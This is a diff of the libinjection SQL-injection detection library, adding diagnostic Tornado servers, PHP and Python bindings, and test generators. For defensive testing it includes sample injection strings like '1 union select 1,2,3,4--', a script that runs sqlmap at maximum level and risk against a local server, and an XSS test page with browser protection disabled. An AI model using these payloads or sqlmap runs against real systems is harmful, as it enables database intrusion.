extra = {}
|
||||
sqli = libinjection.detectsqli(arg, extra)
|
||||
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
|
||||
#for arg in param:
|
||||
# fd.write(arg + "\n")
|
||||
# #fd.write(urllib.quote_plus(arg) + "\n")
|
||||
self.set_status(500)
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
else:
|
||||
self.write("<html><head><title>sqli</title></head><body></body></html>")
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"cookie_secret": "yo mama sayz=",
|
||||
"xsrf_cookies": True,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/null", NullHandler),
|
||||
(r"/shutdown", ShutdownHandler),
|
||||
(r"/count", CountHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
global fd
|
||||
global count
|
||||
|
||||
count = 0
|
||||
|
||||
fd = open('./sqlmap-false-negatives.txt', 'w')
|
||||
|
||||
import tornado.options
|
||||
#tornado.options.parse_config_file("/etc/server.conf")
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
http_server = tornado.httpserver.HTTPServer(application)
|
||||
http_server.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
29
libinjection/misc/run_sqlmap.sh
Executable file
29
libinjection/misc/run_sqlmap.sh
Executable file
|
@ -0,0 +1,29 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Starts a bogus webserver that logs all input
|
||||
# Then runs sqlmap
|
||||
#
|
||||
|
||||
./nullserver.py --logging=none &
|
||||
|
||||
if [ ! -d "sqlmap" ]; then
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git
|
||||
else
|
||||
(cd sqlmap; git pull)
|
||||
fi
|
||||
|
||||
SQLMAP=./sqlmap/sqlmap.py
|
||||
URL=http://127.0.0.1:8888
|
||||
|
||||
HPP=
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
HPP=--hpp
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
curl -o /dev/null ${URL}/shutdown
|
||||
|
339
libinjection/misc/sqliserver.py
Executable file
339
libinjection/misc/sqliserver.py
Executable file
|
@ -0,0 +1,339 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
import datetime
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
import urlparse
|
||||
try:
|
||||
import libinjection
|
||||
except:
|
||||
pass
|
||||
|
||||
from tornado import template
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import tornado.wsgi
|
||||
import tornado.escape
|
||||
import tornado.options
|
||||
|
||||
def breakapart(s):
|
||||
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
|
||||
"""
|
||||
return s.replace(',', ', ').replace('/*',' /*')
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
""" Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 20):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def print_token_string(tok):
|
||||
"""
|
||||
returns the value of token, handling opening and closing quote characters
|
||||
"""
|
||||
out = ''
|
||||
if tok.str_open != '\0':
|
||||
out += tok.str_open
|
||||
out += tok.val
|
||||
if tok.str_close != '\0':
|
||||
out += tok.str_close
|
||||
return out
|
||||
|
||||
def print_token(tok):
|
||||
"""
|
||||
prints a token for use in unit testing
|
||||
"""
|
||||
out = ''
|
||||
if tok.type == 's':
|
||||
out += print_token_string(tok)
|
||||
elif tok.type == 'v':
|
||||
vc = tok.count;
|
||||
if vc == 1:
|
||||
out += '@'
|
||||
elif vc == 2:
|
||||
out += '@@'
|
||||
out += print_token_string(tok)
|
||||
else:
|
||||
out += tok.val
|
||||
return (tok.type, out)
|
||||
|
||||
def alltokens(val, flags):
|
||||
|
||||
if flags & libinjection.FLAG_QUOTE_SINGLE:
|
||||
contextstr = 'single'
|
||||
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
|
||||
contextstr = 'double'
|
||||
else:
|
||||
contextstr = 'none'
|
||||
|
||||
if flags & libinjection.FLAG_SQL_ANSI:
|
||||
commentstr = 'ansi'
|
||||
elif flags & libinjection.FLAG_SQL_MYSQL:
|
||||
commentstr = 'mysql'
|
||||
else:
|
||||
raise RuntimeException("bad quote context")
|
||||
|
||||
parse = {
|
||||
'comment': commentstr,
|
||||
'quote': contextstr
|
||||
}
|
||||
args = []
|
||||
sqlstate = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sqlstate, val, flags)
|
||||
count = 0
|
||||
while count < 25:
|
||||
count += 1
|
||||
ok = libinjection.sqli_tokenize(sqlstate)
|
||||
if ok == 0:
|
||||
break
|
||||
args.append(print_token(sqlstate.current))
|
||||
|
||||
|
||||
parse['tokens'] = args
|
||||
|
||||
args = []
|
||||
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
|
||||
for i in range(len(sqlstate.fingerprint)):
|
||||
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
|
||||
parse['folds'] = args
|
||||
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
parse['fingerprint'] = fingerprint
|
||||
# todo add stats
|
||||
|
||||
return parse
|
||||
|
||||
class PageHandler(tornado.web.RequestHandler):
|
||||
def get(self, pagename):
|
||||
if pagename == '':
|
||||
pagename = 'home'
|
||||
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render(
|
||||
pagename + '.html',
|
||||
title = pagename.replace('-',' '),
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class XssTestHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
settings = self.application.settings
|
||||
|
||||
ldr = template.Loader(".")
|
||||
|
||||
args = ['', '', '', '', '', '', '', '', '', '']
|
||||
|
||||
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
|
||||
for kv in qsl:
|
||||
print kv
|
||||
try:
|
||||
index = int(kv[0])
|
||||
val = tornado.escape.url_unescape(kv[1])
|
||||
print "XXX", index, val
|
||||
args[index] = val
|
||||
except Exception,e:
|
||||
print e
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.write(ldr.load('xsstest.html').generate(args=args))
|
||||
|
||||
class DaysSinceHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
lastevasion = datetime.date(2013, 9, 12)
|
||||
today = datetime.date.today()
|
||||
daynum = (today - lastevasion).days
|
||||
if daynum < 10:
|
||||
days = "00" + str(daynum)
|
||||
elif daynum < 100:
|
||||
days = "0" + str(daynum)
|
||||
else:
|
||||
days = str(daynum)
|
||||
|
||||
self.render(
|
||||
"days-since-last-bypass.html",
|
||||
title='libinjection: Days Since Last Bypass',
|
||||
days=days,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
arg = self.request.arguments.get('type', [])
|
||||
if len(arg) > 0 and arg[0] == 'tokens':
|
||||
return self.get_tokens()
|
||||
else:
|
||||
return self.get_fingerprints()
|
||||
|
||||
def get_tokens(self):
|
||||
ids = self.request.arguments.get('id', [])
|
||||
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
val = urllib.unquote(formvalue)
|
||||
parsed = []
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("tokens.html",
|
||||
title='libjection sqli token parsing diagnostics',
|
||||
version = libinjection.version(),
|
||||
parsed=parsed,
|
||||
formvalue=val,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
def get_fingerprints(self):
|
||||
#unquote = urllib.unquote
|
||||
#detectsqli = libinjection.detectsqli
|
||||
|
||||
ids = self.request.arguments.get('id', [])
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
args = []
|
||||
extra = {}
|
||||
qssqli = False
|
||||
|
||||
sqlstate = libinjection.sqli_state()
|
||||
|
||||
allfp = {}
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
|
||||
fps = []
|
||||
|
||||
val = values[0]
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['double', 'mysql', issqli, pat])
|
||||
|
||||
allfp[name] = {
|
||||
'value': breakify(breakapart(val)),
|
||||
'fingerprints': fps
|
||||
}
|
||||
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
for val in values:
|
||||
# do it one more time include cut-n-paste was already url-encoded
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
|
||||
# swig returns 1/0, convert to True False
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
issqli = bool(libinjection.is_sqli(sqlstate))
|
||||
|
||||
# True if any issqli values are true
|
||||
qssqli = qssqli or issqli
|
||||
val = breakapart(val)
|
||||
|
||||
pat = sqlstate.fingerprint
|
||||
if not issqli:
|
||||
pat = 'see below'
|
||||
args.append([name, val, issqli, pat])
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("form.html",
|
||||
title='libjection sqli diagnostic',
|
||||
version = libinjection.version(),
|
||||
is_sqli=qssqli,
|
||||
args=args,
|
||||
allfp = allfp,
|
||||
formvalue=formvalue,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"template_path": os.path.join(os.path.dirname(__file__), "."),
|
||||
"xsrf_cookies": False,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/diagnostics", NullHandler),
|
||||
(r'/xsstest', XssTestHandler),
|
||||
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
|
||||
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
|
||||
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r"/([a-z-]*)", PageHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
|
||||
|
||||
application.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
||||
|
BIN
libinjection/misc/static/favicon.gif
Normal file
BIN
libinjection/misc/static/favicon.gif
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.9 KiB |
BIN
libinjection/misc/static/favicon.ico
Normal file
BIN
libinjection/misc/static/favicon.ico
Normal file
Binary file not shown.
After Width: | Height: | Size: 4.2 KiB |
BIN
libinjection/misc/static/favicon.png
Normal file
BIN
libinjection/misc/static/favicon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 3.1 KiB |
2
libinjection/misc/static/robots.txt
Normal file
2
libinjection/misc/static/robots.txt
Normal file
|
@ -0,0 +1,2 @@
|
|||
User-agent: *
|
||||
Disallow:
|
13
libinjection/php/config.m4
Normal file
13
libinjection/php/config.m4
Normal file
|
@ -0,0 +1,13 @@
|
|||
dnl based on
|
||||
dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
|
||||
|
||||
|
||||
PHP_ARG_ENABLE(libinjection, for libinjection support,
|
||||
[ --enable-libinjection Include libinjection])
|
||||
|
||||
dnl Check whether the extension is enabled at all
|
||||
if test "$PHP_LIBINJECTION" != "no"; then
|
||||
dnl Finally, tell the build system about the extension and what files are needed
|
||||
PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
|
||||
PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
|
||||
fi
|
25
libinjection/php/example.php
Normal file
25
libinjection/php/example.php
Normal file
|
@ -0,0 +1,25 @@
|
|||
<?php
|
||||
|
||||
// add to your ini file:
|
||||
// extension=YOUR DIRECTORY//libinjection.so
|
||||
|
||||
echo "Using libinjection " . LIBINJECTION_VERSION . "\n";
|
||||
|
||||
// make a state object .. can be reused
|
||||
$x = new_libinjection_sqli_state();
|
||||
|
||||
// pass it in to init
|
||||
// arg 1 -- state objection above
|
||||
// arg 2 -- php string of input -- MUST BE URL-DECODED
|
||||
// arg 3 -- flags -- just pass in '0' for now
|
||||
$input = "1 union select 1,2,3,4--";
|
||||
libinjection_sqli_init($x, $input, 0);
|
||||
|
||||
// do a test
|
||||
$sqli = libinjection_is_sqli($x);
|
||||
if ($sqli == 1) {
|
||||
echo "sqli with fingerprint " . libinjection_sqli_state_fingerprint_get($x) . "\n";
|
||||
} else {
|
||||
echo "not sqli";
|
||||
}
|
||||
|
136
libinjection/php/gentests.py
Executable file
136
libinjection/php/gentests.py
Executable file
|
@ -0,0 +1,136 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Takes testing files and turns them PHP module tests
|
||||
"""
|
||||
|
||||
import glob
|
||||
import os
|
||||
|
||||
def phpescape(s):
|
||||
"""
|
||||
escapes plain text into php-code
|
||||
"""
|
||||
return s.replace("\\", "\\\\").replace("$", "\\$")
|
||||
|
||||
def readtestdata(filename):
|
||||
"""
|
||||
Read a test file and split into components
|
||||
"""
|
||||
|
||||
state = None
|
||||
info = {
|
||||
'--TEST--': '',
|
||||
'--INPUT--': '',
|
||||
'--EXPECTED--': ''
|
||||
}
|
||||
|
||||
for line in open(filename, 'r'):
|
||||
line = line.rstrip()
|
||||
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
|
||||
state = line
|
||||
elif state:
|
||||
info[state] += line + '\n'
|
||||
|
||||
# remove last newline from input
|
||||
info['--INPUT--'] = info['--INPUT--'][0:-1]
|
||||
|
||||
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
|
||||
|
||||
def gentest_tokens():
|
||||
"""
|
||||
generate token phpt test
|
||||
"""
|
||||
for testname in sorted(glob.glob('../tests/test-tokens-*.txt')):
|
||||
data = readtestdata(os.path.join('../tests', testname))
|
||||
testname = os.path.basename(testname)
|
||||
phpt = """
|
||||
--TEST--
|
||||
{1}
|
||||
--FILE--
|
||||
<?php
|
||||
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
|
||||
$sqlistate = new_libinjection_sqli_state();
|
||||
$s = <<<EOT
|
||||
{2}
|
||||
EOT;
|
||||
$s = trim($s);
|
||||
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
|
||||
while (libinjection_sqli_tokenize($sqlistate)) {{
|
||||
echo(print_token(libinjection_sqli_state_current_get($sqlistate)) . "\\n");
|
||||
}}
|
||||
--EXPECT--
|
||||
{3}
|
||||
"""
|
||||
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
|
||||
|
||||
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
|
||||
fd.write(phpt.strip())
|
||||
|
||||
|
||||
def gentest_folding():
|
||||
for testname in sorted(glob.glob('../tests/test-folding-*.txt')):
|
||||
data = readtestdata(os.path.join('../tests', testname))
|
||||
testname = os.path.basename(testname)
|
||||
phpt = """
|
||||
--TEST--
|
||||
{1}
|
||||
--FILE--
|
||||
<?php
|
||||
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
|
||||
$sqlistate = new_libinjection_sqli_state();
|
||||
$s = <<<EOT
|
||||
{2}
|
||||
EOT;
|
||||
$s = trim($s);
|
||||
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
|
||||
$fingerprint = libinjection_sqli_fingerprint($sqlistate, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
|
||||
for ($i = 0; $i < strlen($fingerprint); $i++) {{
|
||||
echo(print_token(libinjection_sqli_get_token($sqlistate, $i)) . "\\n");
|
||||
}}
|
||||
--EXPECT--
|
||||
{3}
|
||||
"""
|
||||
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
|
||||
|
||||
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
|
||||
fd.write(phpt.strip())
|
||||
|
||||
def gentest_fingerprints():
|
||||
"""
|
||||
generate phpt for testing sqli testing
|
||||
"""
|
||||
for testname in sorted(glob.glob('../tests/test-sqli-*.txt')):
|
||||
data = readtestdata(os.path.join('../tests', testname))
|
||||
testname = os.path.basename(testname)
|
||||
phpt = """
|
||||
--TEST--
|
||||
{0}
|
||||
--DESCRIPTION--
|
||||
{1}
|
||||
--FILE--
|
||||
<?php
|
||||
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
|
||||
$sqlistate = new_libinjection_sqli_state();
|
||||
$s = <<<EOT
|
||||
{2}
|
||||
EOT;
|
||||
$s = trim($s);
|
||||
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
|
||||
$ok = libinjection_is_sqli($sqlistate);
|
||||
if ($ok == 1) {{
|
||||
echo(libinjection_sqli_state_fingerprint_get($sqlistate) . "\n");
|
||||
}}
|
||||
--EXPECT--
|
||||
{3}
|
||||
"""
|
||||
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
|
||||
|
||||
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
|
||||
fd.write(phpt.strip())
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
gentest_tokens()
|
||||
gentest_folding()
|
||||
gentest_fingerprints()
|
53
libinjection/php/json2php.py
Executable file
53
libinjection/php/json2php.py
Executable file
|
@ -0,0 +1,53 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Copyright 2012, 2013 Nick Galbreath
|
||||
# nickg@client9.com
|
||||
# BSD License -- see COPYING.txt for details
|
||||
#
|
||||
|
||||
"""
|
||||
Converts a libinjection JSON data file to PHP array
|
||||
"""
|
||||
|
||||
def toc(obj):
|
||||
""" main routine """
|
||||
|
||||
print """<?php
|
||||
function lookup($state, $stype, $keyword) {
|
||||
$keyword = struper(keyword);
|
||||
if ($stype == libinjection.LOOKUP_FINGERPRINT) {
|
||||
if ($keyword == $fingerprints && libinjection.sqli_not_whitelist($state)) {
|
||||
return 'F';
|
||||
} else {
|
||||
return chr(0);
|
||||
}
|
||||
}
|
||||
return $words.get(keyword, chr(0));
|
||||
}
|
||||
"""
|
||||
|
||||
words = {}
|
||||
keywords = obj['keywords']
|
||||
for k,v in keywords.iteritems():
|
||||
words[str(k)] = str(v)
|
||||
|
||||
print '$words = array('
|
||||
for k in sorted(words.keys()):
|
||||
print "'{0}' => '{1}',".format(k, words[k])
|
||||
print ');\n'
|
||||
|
||||
|
||||
keywords = obj['fingerprints']
|
||||
print '$fingerprints = array('
|
||||
for k in sorted(keywords):
|
||||
print "'{0}',".format(k.upper())
|
||||
print ');'
|
||||
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
sys.exit(toc(json.load(sys.stdin)))
|
||||
|
||||
|
18
libinjection/php/libinjection.i
Normal file
18
libinjection/php/libinjection.i
Normal file
|
@ -0,0 +1,18 @@
|
|||
/* libinjection.i SWIG interface file for PHP */
|
||||
%module libinjection
|
||||
%{
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
struct libinjection_sqli_token * libinjection_sqli_state_tokenvec_geti(sfilter* sf, int i) {
|
||||
return &(sf->tokenvec[i]);
|
||||
}
|
||||
%}
|
||||
|
||||
%include "typemaps.i"
|
||||
|
||||
// automatically append string length into arg array
|
||||
%apply (char *STRING, size_t LENGTH) { (const char *s, size_t slen) };
|
||||
|
||||
%include "libinjection.h"
|
||||
%include "libinjection_sqli.h"
|
35
libinjection/php/testsupport.php
Normal file
35
libinjection/php/testsupport.php
Normal file
|
@ -0,0 +1,35 @@
|
|||
<?php
|
||||
function print_token($tok) {
|
||||
$tt = libinjection_sqli_token_type_get($tok);
|
||||
$out = '';
|
||||
$out .= $tt;
|
||||
$out .= ' ';
|
||||
if ($tt == 's') {
|
||||
$out .= print_token_string($tok);
|
||||
} else if ($tt == 'v') {
|
||||
$vc = libinjection_sqli_token_count_get($tok);
|
||||
if ($vc == 1) {
|
||||
$out .= '@';
|
||||
} else if ($vc == 2) {
|
||||
$out .= '@@';
|
||||
}
|
||||
$out .= print_token_string($tok);
|
||||
} else {
|
||||
$out .= libinjection_sqli_token_val_get($tok);
|
||||
}
|
||||
return trim($out);
|
||||
}
|
||||
|
||||
function print_token_string($tok) {
|
||||
$out = '';
|
||||
$quote = libinjection_sqli_token_str_open_get($tok);
|
||||
if ($quote != "\0") {
|
||||
$out .= $quote;
|
||||
}
|
||||
$out .= libinjection_sqli_token_val_get($tok);
|
||||
$quote = libinjection_sqli_token_str_close_get($tok);
|
||||
if ($quote != "\0") {
|
||||
$out .= $quote;
|
||||
}
|
||||
return $out;
|
||||
}
|
58
libinjection/python/apitest.py
Executable file
58
libinjection/python/apitest.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
Work-in-progress
|
||||
"""
|
||||
|
||||
from libinjection import *
|
||||
from words import words
|
||||
|
||||
print dir(libinjection)
|
||||
|
||||
def print_token_string(tok):
|
||||
"""
|
||||
returns the value of token, handling opening and closing quote characters
|
||||
"""
|
||||
out = ''
|
||||
if tok.str_open != "\0":
|
||||
out += tok.str_open
|
||||
out += tok.val
|
||||
if tok.str_close != "\0":
|
||||
out += tok.str_close
|
||||
return out
|
||||
|
||||
def print_token(tok):
|
||||
"""
|
||||
prints a token for use in unit testing
|
||||
"""
|
||||
out = ''
|
||||
out += tok.type
|
||||
out += ' '
|
||||
if tok.type == 's':
|
||||
out += print_token_string(tok)
|
||||
elif tok.type == 'v':
|
||||
vc = tok.count;
|
||||
if vc == 1:
|
||||
out += '@'
|
||||
elif vc == 2:
|
||||
out += '@@'
|
||||
out += print_token_string(tok)
|
||||
else:
|
||||
out += tok.val
|
||||
return out
|
||||
|
||||
def lookup(state, stype, keyword):
|
||||
keyword = keyword.upper()
|
||||
if stype == 'v':
|
||||
keyword = '0' + keyword
|
||||
ch = words.get(keyword, '')
|
||||
return ch
|
||||
|
||||
sqli = '1 union all select 1 --'
|
||||
|
||||
s = sqli_state()
|
||||
sqli_init(s, sqli, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
|
||||
sqli_callback(s, lookup)
|
||||
|
||||
while sqli_tokenize(s):
|
||||
print print_token(s.current)
|
52
libinjection/python/json2python.py
Executable file
52
libinjection/python/json2python.py
Executable file
|
@ -0,0 +1,52 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Copyright 2012, 2013 Nick Galbreath
|
||||
# nickg@client9.com
|
||||
# BSD License -- see COPYING.txt for details
|
||||
#
|
||||
|
||||
"""
|
||||
Converts a libinjection JSON data file to python dict
|
||||
"""
|
||||
|
||||
def toc(obj):
|
||||
""" main routine """
|
||||
|
||||
print """
|
||||
import libinjection
|
||||
|
||||
def lookup(state, stype, keyword):
|
||||
keyword = keyword.upper()
|
||||
if stype == libinjection.LOOKUP_FINGERPRINT:
|
||||
if keyword in fingerprints and libinjection.sqli_not_whitelist(state):
|
||||
return 'F'
|
||||
else:
|
||||
return chr(0)
|
||||
return words.get(keyword, chr(0))
|
||||
|
||||
"""
|
||||
|
||||
words = {}
|
||||
keywords = obj['keywords']
|
||||
for k,v in keywords.iteritems():
|
||||
words[str(k)] = str(v)
|
||||
|
||||
print 'words = {'
|
||||
for k in sorted(words.keys()):
|
||||
print "'{0}': '{1}',".format(k, words[k])
|
||||
print '}\n'
|
||||
|
||||
|
||||
keywords = obj['fingerprints']
|
||||
print 'fingerprints = set(['
|
||||
for k in sorted(keywords):
|
||||
print "'{0}',".format(k.upper())
|
||||
print '])'
|
||||
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
sys.exit(toc(json.load(sys.stdin)))
|
||||
|
1
libinjection/python/libinjection/__init__.py
Normal file
1
libinjection/python/libinjection/__init__.py
Normal file
|
@ -0,0 +1 @@
|
|||
from libinjection import *
|
81
libinjection/python/libinjection/libinjection.i
Normal file
81
libinjection/python/libinjection/libinjection.i
Normal file
|
@ -0,0 +1,81 @@
|
|||
/* libinjection.i SWIG interface file */
|
||||
%module libinjection
|
||||
%{
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
#include <stddef.h>
|
||||
|
||||
/* This is the callback function that runs a python function
|
||||
*
|
||||
*/
|
||||
static char libinjection_python_check_fingerprint(sfilter* sf, int lookuptype, const char* word, size_t len)
|
||||
{
|
||||
PyObject *fp;
|
||||
PyObject *arglist;
|
||||
PyObject *result;
|
||||
const char* strtype;
|
||||
char ch;
|
||||
|
||||
// get sfilter->pattern
|
||||
// convert to python string
|
||||
fp = SWIG_InternalNewPointerObj((void*)sf, SWIGTYPE_p_libinjection_sqli_state,0);
|
||||
|
||||
arglist = Py_BuildValue("(Nis#)", fp, lookuptype, word, len);
|
||||
// call pyfunct with string arg
|
||||
